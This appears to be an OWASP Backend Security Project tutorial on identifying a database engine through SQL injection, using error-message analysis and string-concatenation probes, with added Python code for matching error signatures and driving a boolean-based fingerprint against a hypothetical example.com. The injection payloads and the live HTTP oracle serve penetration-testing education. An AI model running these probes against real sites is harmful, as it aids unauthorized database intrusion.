OWASP Backend Security Project DBMS Fingerprint

= Fingerprint remote DBMS =

To exploit a SQL Injection vulnerability further you need to know which database engine the web application is using. There are two techniques to accomplish this task:

 * Error Code Analysis
 * Engine Fingerprint

Error Code Analysis
By performing fault injection, or fuzzing (for example, sending a single quote in a parameter), you can gather important information through error code analysis. Let's see some examples:

http://www.example.com/store/findproduct.php?name='

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' at line 1

http://www.example.com/store/products.php?id='

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM products WHERE ID=' ^ in /var/www/store/products.php on line 9
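The two responses above are recognisable by fixed substrings, so the analysis can be automated: send a fault payload, then match the response body against per-engine error signatures. The following is an added example, not code from the OWASP page; the MySQL and pg_exec patterns are taken from the page's examples, the other patterns are standard driver and engine messages, and the sample responses are constructed (assumption: the application echoes the raw database error into the HTTP response, as in the page's examples).

```python
import re
from typing import Dict, List, Optional, Tuple

# Signature regexes for verbose database error messages, keyed by engine.
# The MySQL and pg_exec patterns come from the page's two examples; the
# others are standard driver/engine messages (assumption: the application
# echoes the raw error into the response, as in the page's examples).
ERROR_SIGNATURES: List[Tuple[str, str]] = [
    ("MySQL",      r"You have an error in your SQL syntax|mysql_fetch_array\(\)|MySQL server version"),
    ("PostgreSQL", r"pg_exec|pg_query|unterminated quoted string at or near"),
    ("MS SQL",     r"Unclosed quotation mark after the character string|"
                   r"Microsoft OLE DB Provider for SQL Server|\[SQL Server\]"),
    ("Oracle",     r"\bORA-\d{5}\b|quoted string not properly terminated"),
]

# The single quote is the page's fault payload; a double quote and a backslash
# catch applications that quote their parameters differently.
FAULT_PAYLOADS = ["'", '"', "\\"]


def classify_error(body: str) -> Optional[str]:
    """Return the engine whose error signature appears in the response body, else None."""
    for engine, pattern in ERROR_SIGNATURES:
        if re.search(pattern, body):
            return engine
    return None


def analyze_responses(responses: Dict[str, str]) -> Dict[str, str]:
    """Map each fault payload that produced a recognisable error to an engine name.

    `responses` maps the injected payload to the response body it produced
    (in a real run these bodies come from HTTP requests; here they are constructed)."""
    return {
        payload: engine
        for payload, body in responses.items()
        if (engine := classify_error(body)) is not None
    }


# Constructed sample responses, modelled on the page's first example.
SAMPLE_RESPONSES = {
    "'": "You have an error in your SQL syntax; check the manual that corresponds "
         "to your MySQL server version for the right syntax to use near ' at line 1",
    '"': "<html><body>No products found</body></html>",
}

# Constructed sample modelled on the page's second example.
PG_SAMPLE = (
    "Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: unterminated quoted "
    "string at or near \"'\" LINE 1: SELECT * FROM products WHERE ID=' ^ "
    "in /var/www/store/products.php on line 9"
)

if __name__ == "__main__":
    print(analyze_responses(SAMPLE_RESPONSES))  # {"'": 'MySQL'}
    print(classify_error(PG_SAMPLE))            # PostgreSQL
```

The signatures are checked in order and the first match wins, so keep engine-specific strings (function names such as pg_exec, the ORA- code prefix) ahead of anything generic; a bare "ERROR:" would match far too much.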

Engine Fingerprint
First of all, let's see what differences exist between DBMSs. One of the biggest differences between database engines is how they concatenate strings:

 MS SQL:    +
 MySQL:     CONCAT(,)
 Oracle:    ||, CONCAT(,)
 Postgres:  ||

As you can see, both Oracle and Postgres use the || operator to perform such a concatenation, so we need another difference to distinguish them.

Oracle (PL/SQL) also defines the CONCAT function for string concatenation, and as you can guess this one is not defined in Postgres. Note that PostgreSQL 9.1 and later do define concat(), and SQL Server 2012 and later define CONCAT() too, so on recent releases this check alone no longer separates Postgres from Oracle (or MySQL from MS SQL); confirm with an engine-specific function such as version() or @@version.

Example:

Let say you're testing the following URL: http://www.example.com/news.php?id=1

You checked that the above URL is vulnerable to a blind SQL injection. It means that http://www.example.com/news.php returns the same contents for both id=1 (http://www.example.com/news.php?id=1) and id=1 AND 1=1 (http://www.example.com/news.php?id=1 AND 1=1), while id=1 AND 1=2 returns a different page (otherwise the parameter is not a usable true/false oracle).

You know that different engines use different operators for string concatenation, so all you have to do is compare the original page (id=1) with:

 * id=1 AND 'aa'='a'+'a'         [MS SQL]
 * id=1 AND 'aa'=CONCAT('a','a') [MySQL/Oracle]
 * id=1 AND 'aa'='a'||'a'        [Oracle/Postgres]

Two caveats: when sending these in a URL, encode the + as %2B, otherwise the web server decodes it as a space; and MySQL silently converts both 'a'+'a' and 'aa' to the number 0, so the MS SQL test also evaluates true on MySQL (its || operator is logical OR unless the PIPES_AS_CONCAT sql_mode is set, so the third test stays false there).

MS SQL: The following comparison should be true:
 * http://www.example.com/news.php?id=1
 * http://www.example.com/news.php?id=1 AND 'aa'='a'+'a'

MySQL: The following comparison should be true:
 * http://www.example.com/news.php?id=1
 * http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a')

Oracle: The following comparison should be true:
 * http://www.example.com/news.php?id=1
 * http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a')
 * http://www.example.com/news.php?id=1 AND 'aa'='a'||'a'

Postgres: The following comparison should be true:
 * http://www.example.com/news.php?id=1
 * http://www.example.com/news.php?id=1 AND 'aa'='a'||'a'
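The four comparisons above are one procedure: ask a yes/no oracle the three concatenation questions and keep every engine whose known behaviour fits the answers. The driver below is an added example, not code from the OWASP page or from sqlmap. It goes slightly beyond the page by recording version-dependent answers as "either", by URL-encoding the payloads, and by checking the 1=1 / 1=2 controls first; the target URL is the page's hypothetical http://www.example.com/news.php, and the per-engine answer tables used in place of live HTTP requests are constructed (the MySQL and PostgreSQL 9.1 / SQL Server 2012 behaviour noted is an assumption from those engines' documented semantics, not from the page).

```python
"""Boolean-based DBMS fingerprint driver (added example, not from the OWASP page)."""
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Optional

# Hypothetical target from the page's example.
BASE_URL = "http://www.example.com/news.php"
PARAM = "id"
VALUE = "1"

# The page's three concatenation probes. Each is true only on engines whose
# right-hand side evaluates to the string 'aa'.
PROBES: Dict[str, str] = {
    "plus":   "'aa'='a'+'a'",          # T-SQL concatenation operator
    "concat": "'aa'=CONCAT('a','a')",  # MySQL, Oracle (and newer PostgreSQL / SQL Server)
    "pipes":  "'aa'='a'||'a'",         # Oracle, PostgreSQL (SQL-standard operator)
}

# Expected answer per engine: True, False, or None where it depends on the version.
# Assumptions beyond the page: MySQL casts 'a'+'a' and 'aa' to 0, so "plus" is
# also true there; PostgreSQL >= 9.1 and SQL Server >= 2012 define CONCAT().
SIGNATURES: Dict[str, Dict[str, Optional[bool]]] = {
    "MS SQL":     {"plus": True,  "concat": None,  "pipes": False},
    "MySQL":      {"plus": True,  "concat": True,  "pipes": False},
    "Oracle":     {"plus": False, "concat": True,  "pipes": True},
    "PostgreSQL": {"plus": False, "concat": None,  "pipes": True},
}


def build_url(expr: str) -> str:
    """Append `AND <expr>` to the numeric parameter. urlencode() percent-encodes
    the quotes and, crucially, the '+', which a web server would otherwise
    decode as a space."""
    query = urllib.parse.urlencode({PARAM: f"{VALUE} AND {expr}"})
    return f"{BASE_URL}?{query}"


def fingerprint(oracle: Callable[[str], bool]) -> List[str]:
    """Return every engine whose signature is consistent with the oracle's answers.

    `oracle(expr)` must answer True when the page for `id=1 AND <expr>` matches the
    baseline page and False when it differs or errors out."""
    # Control checks: a usable boolean oracle says yes to 1=1 and no to 1=2.
    if not oracle("1=1") or oracle("1=2"):
        raise ValueError("parameter does not behave as a boolean-based injection")
    observed = {name: oracle(expr) for name, expr in PROBES.items()}
    return [
        engine for engine, sig in SIGNATURES.items()
        if all(sig[name] is None or sig[name] == observed[name] for name in PROBES)
    ]


def http_oracle(baseline_body: str) -> Callable[[str], bool]:
    """Live oracle: fetch the injected URL and compare the body with the baseline page.
    (Not exercised offline; shown for completeness.)"""
    def ask(expr: str) -> bool:
        with urllib.request.urlopen(build_url(expr)) as resp:
            return resp.read().decode("utf-8", errors="replace") == baseline_body
    return ask


# Constructed per-engine answers used in place of HTTP requests (assumption: an
# engine error, e.g. Oracle rejecting 'a'+'a' as an invalid number, shows a
# different page and therefore counts as False).
SIMULATED_ENGINES: Dict[str, Dict[str, bool]] = {
    "MySQL 5.7":       {"plus": True,  "concat": True,  "pipes": False},
    "SQL Server 2008": {"plus": True,  "concat": False, "pipes": False},
    "PostgreSQL 8.4":  {"plus": False, "concat": False, "pipes": True},
    "Oracle 11g":      {"plus": False, "concat": True,  "pipes": True},
}


def simulated_oracle(engine: str) -> Callable[[str], bool]:
    """Offline stand-in for http_oracle() that answers as `engine` would."""
    answers = {"1=1": True, "1=2": False}
    answers.update({PROBES[name]: value for name, value in SIMULATED_ENGINES[engine].items()})
    return lambda expr: answers[expr]


if __name__ == "__main__":
    for engine in SIMULATED_ENGINES:
        print(f"{engine:16} -> {fingerprint(simulated_oracle(engine))}")
    print(build_url(PROBES["plus"]))
```

The result is a candidate list rather than a single name on purpose: a MySQL target also satisfies the MS SQL signature because of its numeric coercion, and an Oracle target is indistinguishable from a recent PostgreSQL with these three probes alone. When the list has more than one entry, follow up with a version query that only one candidate accepts.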

Tools
Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injection tool